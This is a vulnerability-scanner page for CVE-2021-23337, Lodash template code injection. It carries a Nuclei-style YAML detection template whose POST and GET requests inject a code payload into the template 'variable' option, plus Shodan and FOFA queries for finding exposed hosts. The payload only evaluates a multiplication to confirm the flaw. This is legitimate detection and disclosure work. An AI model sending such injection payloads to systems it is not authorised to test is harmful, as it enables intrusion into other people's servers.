Lodash Template - Server-Side Template Injection (RCE)
CVE-2021-23337
Verified
Description
Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Severity
High
CVSS Score
7.2
Exploit Probability
22%
Affected Product
lodash
Published Date
April 7, 2026
Template Author
dhiyaneshdk
CVE-2021-23337.yaml
id: CVE-2021-23337
info:
name: Lodash Template - Server-Side Template Injection (RCE)
author: DhiyaneshDk
severity: high
description: |
Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
impact: |
Attackers can execute arbitrary commands on the host system, leading to full system compromise.
remediation: |
Update to version 4.17.21 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-23337
- https://security.snyk.io/vuln/SNYK-JS-LODASH-1040724
- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
- https://github.com/advisories/GHSA-35jh-r3h4-6jhm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-23337
cwe-id: CWE-94
epss-score: 0.2241
epss-percentile: 0.97409
metadata:
verified: true
max-request: 2
vendor: lodash
product: lodash
shodan-query: http.component:"lodash"
fofa-query: body="lodash"
tags: cve,cve2021,lodash,ssti,rce,nodejs,javascript
flow: http(1) || http(2)
variables:
randA: "{{rand_int(1000, 9999)}}"
randB: "{{rand_int(1000, 9999)}}"
http:
- raw:
- |
POST /template HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"template":"<%= name %>","variable":") { return String({{randA}}*{{randB}}) }; with(obj","data":{"name":"test"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{to_number(randA)*to_number(randB)}}"
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: eval_result
regex:
- "[0-9]+"
- raw:
- |
GET /render?tpl=hello&variable=)%7Breturn+String({{randA}}*{{randB}})%7D%3Bwith(obj HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{to_number(randA)*to_number(randB)}}"
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: eval_result
regex:
- "[0-9]+"
# digest: 4b0a00483046022100ef70c084b91ab0f46d9e3f23356aff0c2026361cf9767a76c6eeacb5b44b7260022100b1df858bedbc338674891a4218dd82904e44e3d43758a834b37b78f6918ac5fa:922c64590222798bb761d5b6d8e729507.2Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2021-23337
CWE ID:
cwe-94
Remediation Steps
Update to version 4.17.21 or later.